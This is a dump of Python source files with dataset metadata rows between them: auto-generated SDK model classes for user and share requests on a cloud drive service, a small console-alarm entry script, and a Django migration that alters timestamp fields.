starred: bool = None,
user_meta: str = None,
):
# check_name_mode
self.check_name_mode = check_name_mode
self.custom_index_key = custom_index_key
# description
type: string
self.description = description
# drive_id
self.drive_id = drive_id
self.encrypt_mode = encrypt_mode
# file_id
self.file_id = file_id
self.file_id_path = file_id_path
# hidden
type: boolean
self.hidden = hidden
# labels
self.labels = labels
self.meta = meta
# name
self.name = name
self.referer = referer
self.share_id = share_id
self.sign_token = sign_token
# starred
type: boolean
self.starred = starred
# user_meta
self.user_meta = user_meta
def validate(self):
if self.description is not None:
self.validate_max_length(self.description, 'description', 1024)
self.validate_required(self.drive_id, 'drive_id')
if self.drive_id is not None:
self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
self.validate_required(self.file_id, 'file_id')
if self.file_id is not None:
self.validate_max_length(self.file_id, 'file_id', 50)
self.validate_pattern(self.file_id, 'file_id', '[a-z0-9.-_]{1,50}')
if self.name is not None:
self.validate_max_length(self.name, 'name', 1024)
def to_map(self):
result = dict()
if self.check_name_mode is not None:
result['check_name_mode'] = self.check_name_mode
if self.custom_index_key is not None:
result['custom_index_key'] = self.custom_index_key
if self.description is not None:
result['description'] = self.description
if self.drive_id is not None:
result['drive_id'] = self.drive_id
if self.encrypt_mode is not None:
result['encrypt_mode'] = self.encrypt_mode
if self.file_id is not None:
result['file_id'] = self.file_id
if self.file_id_path is not None:
result['file_id_path'] = self.file_id_path
if self.hidden is not None:
result['hidden'] = self.hidden
if self.labels is not None:
result['labels'] = self.labels
if self.meta is not None:
result['meta'] = self.meta
if self.name is not None:
result['name'] = self.name
if self.referer is not None:
result['referer'] = self.referer
if self.share_id is not None:
result['share_id'] = self.share_id
if self.sign_token is not None:
result['sign_token'] = self.sign_token
if self.starred is not None:
result['starred'] = self.starred
if self.user_meta is not None:
result['user_meta'] = self.user_meta
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('check_name_mode') is not None:
self.check_name_mode = m.get('check_name_mode')
if m.get('custom_index_key') is not None:
self.custom_index_key = m.get('custom_index_key')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('drive_id') is not None:
self.drive_id = m.get('drive_id')
if m.get('encrypt_mode') is not None:
self.encrypt_mode = m.get('encrypt_mode')
if m.get('file_id') is not None:
self.file_id = m.get('file_id')
if m.get('file_id_path') is not None:
self.file_id_path = m.get('file_id_path')
if m.get('hidden') is not None:
self.hidden = m.get('hidden')
if m.get('labels') is not None:
self.labels = m.get('labels')
if m.get('meta') is not None:
self.meta = m.get('meta')
if m.get('name') is not None:
self.name = m.get('name')
if m.get('referer') is not None:
self.referer = m.get('referer')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('sign_token') is not None:
self.sign_token = m.get('sign_token')
if m.get('starred') is not None:
self.starred = m.get('starred')
if m.get('user_meta') is not None:
self.user_meta = m.get('user_meta')
return self
class UpdateShareRequest(TeaModel):
"""
update share request
"""
def __init__(
self,
headers: Dict[str, str] = None,
description: str = None,
expiration: str = None,
permissions: List[str] = None,
share_id: str = None,
share_name: str = None,
share_policy: List[SharePermissionPolicy] = None,
status: str = None,
):
self.headers = headers
# description
self.description = description
# expiration
self.expiration = expiration
# permissions
self.permissions = permissions
# share_id
self.share_id = share_id
# share_name
self.share_name = share_name
# share_policy
self.share_policy = share_policy
# status
self.status = status
def validate(self):
if self.description is not None:
self.validate_max_length(self.description, 'description', 1024)
self.validate_required(self.share_id, 'share_id')
if self.share_policy:
for k in self.share_policy:
if k:
k.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.description is not None:
result['description'] = self.description
if self.expiration is not None:
result['expiration'] = self.expiration
if self.permissions is not None:
result['permissions'] = self.permissions
if self.share_id is not None:
result['share_id'] = self.share_id
if self.share_name is not None:
result['share_name'] = self.share_name
result['share_policy'] = []
if self.share_policy is not None:
for k in self.share_policy:
result['share_policy'].append(k.to_map() if k else None)
if self.status is not None:
result['status'] = self.status
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('expiration') is not None:
self.expiration = m.get('expiration')
if m.get('permissions') is not None:
self.permissions = m.get('permissions')
if m.get('share_id') is not None:
self.share_id = m.get('share_id')
if m.get('share_name') is not None:
self.share_name = m.get('share_name')
self.share_policy = []
if m.get('share_policy') is not None:
for k in m.get('share_policy'):
temp_model = SharePermissionPolicy()
self.share_policy.append(temp_model.from_map(k))
if m.get('status') is not None:
self.status = m.get('status')
return self
class CreateUserResponse(TeaModel):
"""
Create user response
"""
def __init__(
self,
avatar: str = None,
created_at: int = None,
default_drive_id: str = None,
description: str = None,
domain_id: str = None,
email: str = None,
nick_name: str = None,
phone: str = None,
role: str = None,
status: str = None,
updated_at: int = None,
user_data: dict = None,
user_id: str = None,
user_name: str = None,
):
# 头像
self.avatar = avatar
# 用户创建时间
self.created_at = created_at
# 默认 Drive ID
self.default_drive_id = default_drive_id
# 用户备注信息
self.description = description
# Domain ID
self.domain_id = domain_id
# 邮箱
self.email = email
# 昵称
self.nick_name = nick_name
# 电话
self.phone = phone
# 角色
self.role = role
# 用户状态
self.status = status
# 用户修改时间
self.updated_at = updated_at
# 用户自定义数据,格式为json,可用于配置项、少量临时数据等存储,不超过1K
self.user_data = user_data
# 用户 ID
self.user_id = user_id
# 用户名称
self.user_name = user_name
def validate(self):
pass
def to_map(self):
result = dict()
if self.avatar is not None:
result['avatar'] = self.avatar
if self.created_at is not None:
result['created_at'] = self.created_at
if self.default_drive_id is not None:
result['default_drive_id'] = self.default_drive_id
if self.description is not None:
result['description'] = self.description
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.email is not None:
result['email'] = self.email
if self.nick_name is not None:
result['nick_name'] = self.nick_name
if self.phone is not None:
result['phone'] = self.phone
if self.role is not None:
result['role'] = self.role
if self.status is not None:
result['status'] = self.status
if self.updated_at is not None:
result['updated_at'] = self.updated_at
if self.user_data is not None:
result['user_data'] = self.user_data
if self.user_id is not None:
result['user_id'] = self.user_id
if self.user_name is not None:
result['user_name'] = self.user_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('avatar') is not None:
self.avatar = m.get('avatar')
if m.get('created_at') is not None:
self.created_at = m.get('created_at')
if m.get('default_drive_id') is not None:
self.default_drive_id = m.get('default_drive_id')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('email') is not None:
self.email = m.get('email')
if m.get('nick_name') is not None:
self.nick_name = m.get('nick_name')
if m.get('phone') is not None:
self.phone = m.get('phone')
if m.get('role') is not None:
self.role = m.get('role')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('updated_at') is not None:
self.updated_at = m.get('updated_at')
if m.get('user_data') is not None:
self.user_data = m.get('user_data')
if m.get('user_id') is not None:
self.user_id = m.get('user_id')
if m.get('user_name') is not None:
self.user_name = m.get('user_name')
return self
class CreateUserModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: CreateUserResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = CreateUserResponse()
self.body = temp_model.from_map(m['body'])
return self
class DeleteUserModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
):
self.headers = headers
def validate(self):
pass
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
return self
class GetUserResponse(TeaModel):
"""
Get user response
"""
def __init__(
self,
avatar: str = None,
created_at: int = None,
default_drive_id: str = None,
description: str = None,
domain_id: str = None,
email: str = None,
nick_name: str = None,
phone: str = None,
role: str = None,
status: str = None,
updated_at: int = None,
user_data: dict = None,
user_id: str = None,
user_name: str = None,
):
# 头像
self.avatar = avatar
# 用户创建时间
self.created_at = created_at
# 默认 Drive ID
self.default_drive_id = default_drive_id
# 用户备注信息
self.description = description
# Domain ID
self.domain_id = domain_id
# 邮箱
self.email = email
# 昵称
self.nick_name = nick_name
# 电话
self.phone = phone
# 角色
self.role = role
# 用户状态
self.status = status
# 用户修改时间
self.updated_at = updated_at
# 用户自定义数据,格式为json,可用于配置项、少量临时数据等存储,不超过1K
self.user_data = user_data
# 用户 ID
self.user_id = user_id
# 用户名称
self.user_name = user_name
def validate(self):
pass
def to_map(self):
result = dict()
if self.avatar is not None:
result['avatar'] = self.avatar
if self.created_at is not None:
result['created_at'] = self.created_at
if self.default_drive_id is not None:
result['default_drive_id'] = self.default_drive_id
if self.description is not None:
result['description'] = self.description
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.email is not None:
result['email'] = self.email
if self.nick_name is not None:
result['nick_name'] = self.nick_name
if self.phone is not None:
result['phone'] = self.phone
if self.role is not None:
result['role'] = self.role
if self.status is not None:
result['status'] = self.status
if self.updated_at is not None:
result['updated_at'] = self.updated_at
if self.user_data is not None:
result['user_data'] = self.user_data
if self.user_id is not None:
result['user_id'] = self.user_id
if self.user_name is not None:
result['user_name'] = self.user_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('avatar') is not None:
self.avatar = m.get('avatar')
if m.get('created_at') is not None:
self.created_at = m.get('created_at')
if m.get('default_drive_id') is not None:
self.default_drive_id = m.get('default_drive_id')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('email') is not None:
self.email = m.get('email')
if m.get('nick_name') is not None:
self.nick_name = m.get('nick_name')
if m.get('phone') is not None:
self.phone = m.get('phone')
if m.get('role') is not None:
self.role = m.get('role')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('updated_at') is not None:
self.updated_at = m.get('updated_at')
if m.get('user_data') is not None:
self.user_data = m.get('user_data')
if m.get('user_id') is not None:
self.user_id = m.get('user_id')
if m.get('user_name') is not None:
self.user_name = m.get('user_name')
return self
class GetUserModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetUserResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetUserResponse()
self.body = temp_model.from_map(m['body'])
return self
class BaseUserResponse(TeaModel):
"""
Base user response
"""
def __init__(
self,
avatar: str = None,
created_at: int = None,
default_drive_id: str = None,
description: str = None,
domain_id: str = None,
email: str = None,
nick_name: str = None,
phone: str = None,
role: str = None,
status: str = None,
updated_at: int = None,
user_data: dict = None,
user_id: str = None,
user_name: str = None,
):
# 头像
self.avatar = avatar
# 用户创建时间
self.created_at = created_at
# 默认 Drive ID
self.default_drive_id = default_drive_id
# 用户备注信息
self.description = description
# Domain ID
self.domain_id = domain_id
# 邮箱
self.email = email
# 昵称
self.nick_name = nick_name
# 电话
self.phone = phone
# 角色
self.role = role
# 用户状态
self.status = status
# 用户修改时间
self.updated_at = updated_at
# 用户自定义数据,格式为json,可用于配置项、少量临时数据等存储,不超过1K
self.user_data = user_data
# 用户 ID
self.user_id = user_id
# 用户名称
self.user_name = user_name
def validate(self):
pass
def to_map(self):
result = dict()
if self.avatar is not None:
result['avatar'] = self.avatar
if self.created_at is not None:
result['created_at'] = self.created_at
if self.default_drive_id is not None:
result['default_drive_id'] = self.default_drive_id
if self.description is not None:
result['description'] = self.description
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.email is not None:
result['email'] = self.email
if self.nick_name is not None:
result['nick_name'] = self.nick_name
if self.phone is not None:
result['phone'] = self.phone
if self.role is not None:
result['role'] = self.role
if self.status is not None:
result['status'] = self.status
if self.updated_at is not None:
result['updated_at'] = self.updated_at
if self.user_data is not None:
result['user_data'] = self.user_data
if self.user_id is not None:
result['user_id'] = self.user_id
if self.user_name is not None:
result['user_name'] = self.user_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('avatar') is not None:
self.avatar = m.get('avatar')
if m.get('created_at') is not None:
self.created_at = m.get('created_at')
if m.get('default_drive_id') is not None:
self.default_drive_id = m.get('default_drive_id')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('email') is not None:
self.email = m.get('email')
if m.get('nick_name') is not None:
self.nick_name = m.get('nick_name')
if m.get('phone') is not None:
self.phone = m.get('phone')
if m.get('role') is not None:
self.role = m.get('role')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('updated_at') is not None:
self.updated_at = m.get('updated_at')
if m.get('user_data') is not None:
self.user_data = m.get('user_data')
if m.get('user_id') is not None:
self.user_id = m.get('user_id')
if m.get('user_name') is not None:
self.user_name = m.get('user_name')
return self
class ListUserResponse(TeaModel):
"""
List user response
"""
def __init__(
self,
items: List[BaseUserResponse] = None,
next_marker: str = None,
):
self.items = items
# 翻页标记
self.next_marker = next_marker
def validate(self):
if self.items:
for k in self.items:
if k:
k.validate()
def to_map(self):
result = dict()
result['items'] = []
if self.items is not None:
for k in self.items:
result['items'].append(k.to_map() if k else None)
if self.next_marker is not None:
result['next_marker'] = self.next_marker
return result
def from_map(self, m: dict = None):
m = m or dict()
self.items = []
if m.get('items') is not None:
for k in m.get('items'):
temp_model = BaseUserResponse()
self.items.append(temp_model.from_map(k))
if m.get('next_marker') is not None:
self.next_marker = m.get('next_marker')
return self
class ListUsersModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: ListUserResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = ListUserResponse()
self.body = temp_model.from_map(m['body'])
return self
class SearchUserModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: ListUserResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = ListUserResponse()
self.body = temp_model.from_map(m['body'])
return self
class UpdateUserResponse(TeaModel):
"""
Update user response
"""
def __init__(
self,
avatar: str = None,
created_at: int = None,
default_drive_id: str = None,
description: str = None,
domain_id: str = None,
email: str = None,
nick_name: str = None,
phone: str = None,
role: str = None,
status: str = None,
updated_at: int = None,
user_data: dict = None,
user_id: str = None,
user_name: str = None,
):
# 头像
self.avatar = avatar
# 用户创建时间
self.created_at = created_at
# 默认 Drive ID
self.default_drive_id = default_drive_id
# 用户备注信息
self.description = description
# Domain ID
self.domain_id = domain_id
# 邮箱
self.email = email
# 昵称
self.nick_name = nick_name
# 电话
self.phone = phone
# 角色
self.role = role
# 用户状态
self.status = status
# 用户修改时间
self.updated_at = updated_at
# 用户自定义数据,格式为json,可用于配置项、少量临时数据等存储,不超过1K
self.user_data = user_data
# 用户 ID
self.user_id = user_id
# 用户名称
self.user_name = user_name
def validate(self):
pass
def to_map(self):
result = dict()
if self.avatar is not None:
result['avatar'] = self.avatar
if self.created_at is not None:
result['created_at'] = self.created_at
if self.default_drive_id is not None:
result['default_drive_id'] = self.default_drive_id
if self.description is not None:
result['description'] = self.description
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.email is not None:
result['email'] = self.email
if self.nick_name is not None:
result['nick_name'] = self.nick_name
if self.phone is not None:
result['phone'] = self.phone
if self.role is not None:
result['role'] = self.role
if self.status is not None:
result['status'] = self.status
if self.updated_at is not None:
result['updated_at'] = self.updated_at
if self.user_data is not None:
result['user_data'] = self.user_data
if self.user_id is not None:
result['user_id'] = self.user_id
if self.user_name is not None:
result['user_name'] = self.user_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('avatar') is not None:
self.avatar = m.get('avatar')
if m.get('created_at') is not None:
self.created_at = m.get('created_at')
if m.get('default_drive_id') is not None:
self.default_drive_id = m.get('default_drive_id')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('email') is not None:
self.email = m.get('email')
if m.get('nick_name') is not None:
self.nick_name = m.get('nick_name')
if m.get('phone') is not None:
self.phone = m.get('phone')
if m.get('role') is not None:
self.role = m.get('role')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('updated_at') is not None:
self.updated_at = m.get('updated_at')
if m.get('user_data') is not None:
self.user_data = m.get('user_data')
if m.get('user_id') is not None:
self.user_id = m.get('user_id')
if m.get('user_name') is not None:
self.user_name = m.get('user_name')
return self
class UpdateUserModel(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: UpdateUserResponse = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = UpdateUserResponse()
self.body = temp_model.from_map(m['body'])
return self
class CreateUserRequest(TeaModel):
"""
Create user request
"""
def __init__(
self,
headers: Dict[str, str] = None,
avatar: str = None,
description: str = None,
email: str = None,
location: str = None,
nick_name: str = None,
phone: str = None,
role: str = None,
status: str = None,
user_data: dict = None,
user_id: str = None,
user_name: str = None,
):
self.headers = headers
# 头像
self.avatar = avatar
# 描述信息
self.description = description
# 邮箱
self.email = email
# 用户地域
self.location = location
# 昵称
self.nick_name = nick_name
# 电话号码
self.phone = phone
# 角色
self.role = role
# 状态
self.status = status
# 用户自定义数据,格式为json,可用于配置项、少量临时数据等存储,不超过1K
self.user_data = user_data
# 用户 ID
self.user_id = user_id
# 用户名称
self.user_name = user_name
def validate(self):
if self.description is not None:
self.validate_max_length(self.description, 'description', 1024)
self.validate_required(self.user_id, 'user_id')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.avatar is not None:
result['avatar'] = self.avatar
if self.description is not None:
result['description'] = self.description
if self.email is not None:
result['email'] = self.email
if self.location is not None:
result['location'] = self.location
if self.nick_name is not None:
result['nick_name'] = self.nick_name
if self.phone is not None:
result['phone'] = self.phone
if self.role is not None:
result['role'] = self.role
if self.status is not None:
result['status'] = self.status
if self.user_data is not None:
result['user_data'] = self.user_data
if self.user_id is not None:
result['user_id'] = self.user_id
if self.user_name is not None:
result['user_name'] = self.user_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('avatar') is not None:
self.avatar = m.get('avatar')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('email') is not None:
self.email = m.get('email')
if m.get('location') is not None:
self.location = m.get('location')
if m.get('nick_name') is not None:
self.nick_name = m.get('nick_name')
if m.get('phone') is not None:
self.phone = m.get('phone')
if m.get('role') is not None:
self.role = m.get('role')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('user_data') is not None:
self.user_data = m.get('user_data')
if m.get('user_id') is not None:
self.user_id = m.get('user_id')
if m.get('user_name') is not None:
self.user_name = m.get('user_name')
return self
class DeleteUserRequest(TeaModel):
"""
Delete user request
"""
def __init__(
self,
headers: Dict[str, str] = None,
user_id: str = None,
):
self.headers = headers
# 用户 ID
self.user_id = user_id
def validate(self):
self.validate_required(self.user_id, 'user_id')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.user_id is not None:
result['user_id'] = self.user_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('user_id') is not None:
self.user_id = m.get('user_id')
return self
class DeleteUserResponse(TeaModel):
"""
Delete user response
"""
def __init__(self):
pass
def validate(self):
pass
def to_map(self):
result = dict()
return result
def from_map(self, m: dict = None):
m = m or dict()
return self
class GetUserRequest(TeaModel):
"""
Get user request
"""
def __init__(
self,
headers: Dict[str, str] = None,
user_id: str = None,
):
self.headers = headers
# 用户 ID, 使用ak方式访问,该项必传, access_token访问如果不传,默认取自己的user信息
example
self.user_id = user_id
def validate(self):
pass
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.user_id is not None:
result['user_id'] = self.user_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('user_id') is not None:
self.user_id = m.get('user_id')
return self
class ListUserRequest(TeaModel):
"""
List user request
"""
def __init__(
self,
headers: Dict[str, str] = None,
limit: int = None,
marker: str = None,
):
self.headers = headers
# 每页大小限制
self.limit = limit
# 翻页标记
self.marker = marker
def validate(self):
if self.limit is not None:
self.validate_maximum(self.limit, 'limit', 100)
self.validate_minimum(self.limit, 'limit', 1)
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.limit is not None:
result['limit'] = self.limit
if self.marker is not None:
result['marker'] = self.marker
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('limit') is not None:
self.limit = m.get('limit')
if m.get('marker') is not None:
self.marker = m.get('marker')
return self
class SearchUserRequest(TeaModel):
"""
Search user request
"""
def __init__(
self,
headers: Dict[str, str] = None,
email: str = None,
limit: int = None,
marker: str = None,
nick_name: str = None,
phone: str = None,
role: str = None,
status: str = None,
user_name: str = None,
):
self.headers = headers
# 邮箱
self.email = email
# 每页大小限制
self.limit = limit
# 翻页标记
self.marker = marker
# 昵称
self.nick_name = nick_name
# 电话号码
self.phone = phone
# 角色
self.role = role
# 状态
self.status = status
# 用户名
self.user_name = user_name
def validate(self):
if self.limit is not None:
self.validate_maximum(self.limit, 'limit', 100)
self.validate_minimum(self.limit, 'limit', 1)
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.email is not None:
result['email'] = self.email
if self.limit is not None:
result['limit'] = self.limit
if self.marker is not None:
result['marker'] = self.marker
if self.nick_name is not None:
result['nick_name'] = self.nick_name
if self.phone is not None:
result['phone'] = self.phone
if self.role is not None:
result['role'] = self.role
if self.status is not None:
result['status'] = self.status
if self.user_name is not None:
result['user_name'] = self.user_name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('email') is not None:
self.email = m.get('email')
if m.get('limit') is not None:
self.limit = m.get('limit')
if m.get('marker') is not None:
self.marker = m.get('marker')
if m.get('nick_name') is not None:
self.nick_name = m.get('nick_name')
if m.get('phone') is not None:
self.phone = m.get('phone')
if m.get('role') is not None:
self.role = m.get('role')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('user_name') is not None:
self.user_name = m.get('user_name')
return self
class UpdateUserRequest(TeaModel):
"""
Update user request
"""
def __init__(
self,
headers: Dict[str, str] = None,
avatar: str = None,
description: str = None,
email: str = None,
nick_name: str = None,
phone: str = None,
role: str = None,
status: str = None,
user_data: dict = None,
user_id: str = None,
):
self.headers = headers
# 头像
self.avatar = avatar
# 描述信息
self.description = description
# 邮箱
self.email = email
# 昵称
self.nick_name = nick_name
# 电话号码
self.phone = phone
# 角色
self.role = role
# 状态
self.status = status
# 用户自定义数据,格式为json,可用于配置项、少量临时数据等存储,不超过1K
self.user_data = user_data
# 用户 ID
self.user_id = user_id
def validate(self):
if self.description is not None:
self.validate_max_length(self.description, 'description', 1024)
self.validate_required(self.user_id, 'user_id')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.avatar is not None:
result['avatar'] = self.avatar
if self.description is not None:
result['description'] = self.description
if self.email is not None:
result['email'] = self.email
if self.nick_name is not None:
result['nick_name'] = self.nick_name
if self.phone is not None:
result['phone'] = self.phone
if self.role is not None:
result['role'] = self.role
if self.status is not None:
result['status'] = self.status
if self.user_data is not None:
result['user_data'] = self.user_data
if self.user_id is not None:
result['user_id'] = self.user_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('avatar') is not None:
self.avatar = m.get('avatar')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('email') is not None:
self.email = m.get('email')
if m.get('nick_name') is not None:
self.nick_name = m.get('nick_name')
if m.get('phone') is not None:
self.phone = m.get('phone')
if m.get('role') is not None:
self.role = m.get('role')
if m.get('status') is not None:
self.status = m.get('status')
if m.get('user_data') is not None:
self.user_data = m.get('user_data')
if m.get('user_id') is not None:
self.user_id = m.get('user_id')
return self
| 33.999906
| 114
| 0.577791
| 96,101
| 723,620
| 4.132049
| 0.012133
| 0.053262
| 0.095872
| 0.06911
| 0.919498
| 0.891577
| 0.879583
| 0.868308
| 0.857346
| 0.849993
| 0
| 0.002987
| 0.319973
| 723,620
| 21,282
| 115
| 34.001504
| 0.803981
| 0
| 0
| 0.900615
| 1
| 0
| 0.097707
| 0.008903
| 0
| 0
| 0
| 0
| 0.000348
| 0
| null | null | 0.005972
| 0.000116
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
76401e156af9f0ddfb4345eb516b9a0880583194
| 120
|
py
|
Python
|
console_alarm/command_line.py
|
ruerob/console_alarm
|
2aa23f07acdf6a3e4fb677f1662122677de6ba13
|
[
"Unlicense"
] | null | null | null |
console_alarm/command_line.py
|
ruerob/console_alarm
|
2aa23f07acdf6a3e4fb677f1662122677de6ba13
|
[
"Unlicense"
] | null | null | null |
console_alarm/command_line.py
|
ruerob/console_alarm
|
2aa23f07acdf6a3e4fb677f1662122677de6ba13
|
[
"Unlicense"
] | null | null | null |
import sys
from console_alarm import console_alarm
def main():
console_alarm.console_script_entry_point(sys.argv)
| 17.142857
| 54
| 0.816667
| 18
| 120
| 5.111111
| 0.611111
| 0.391304
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 120
| 6
| 55
| 20
| 0.87619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
76486481ab20111b01f2ab2b96ef06cd4028e552
| 2,777
|
py
|
Python
|
assessment/migrations/0009_auto_20190125_1724.py
|
kenware/Assessment
|
69f5e3fbf18dfa2c59eaf3b083ebdba7ca66c9b7
|
[
"MIT"
] | null | null | null |
assessment/migrations/0009_auto_20190125_1724.py
|
kenware/Assessment
|
69f5e3fbf18dfa2c59eaf3b083ebdba7ca66c9b7
|
[
"MIT"
] | 3
|
2020-02-11T23:31:01.000Z
|
2021-06-10T21:04:34.000Z
|
assessment/migrations/0009_auto_20190125_1724.py
|
kenware/Assessment
|
69f5e3fbf18dfa2c59eaf3b083ebdba7ca66c9b7
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.1.4 on 2019-01-25 17:24
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('assessment', '0008_auto_20190125_1249'),
]
operations = [
migrations.AlterField(
model_name='answer',
name='created_at',
field=models.DateTimeField(default=datetime.datetime(2019, 1, 25, 17, 24, 57, 903346)),
),
migrations.AlterField(
model_name='answer',
name='deleted_at',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='answer',
name='updated_at',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='assessment',
name='created_at',
field=models.DateTimeField(default=datetime.datetime(2019, 1, 25, 17, 24, 57, 903346)),
),
migrations.AlterField(
model_name='assessment',
name='deleted_at',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='assessment',
name='updated_at',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='question',
name='created_at',
field=models.DateTimeField(default=datetime.datetime(2019, 1, 25, 17, 24, 57, 903346)),
),
migrations.AlterField(
model_name='question',
name='deleted_at',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='question',
name='updated_at',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='score',
name='created_at',
field=models.DateTimeField(default=datetime.datetime(2019, 1, 25, 17, 24, 57, 903346)),
),
migrations.AlterField(
model_name='score',
name='deleted_at',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='score',
name='end_time',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='score',
name='start_time',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='score',
name='updated_at',
field=models.DateTimeField(blank=True, null=True),
),
]
| 32.670588
| 99
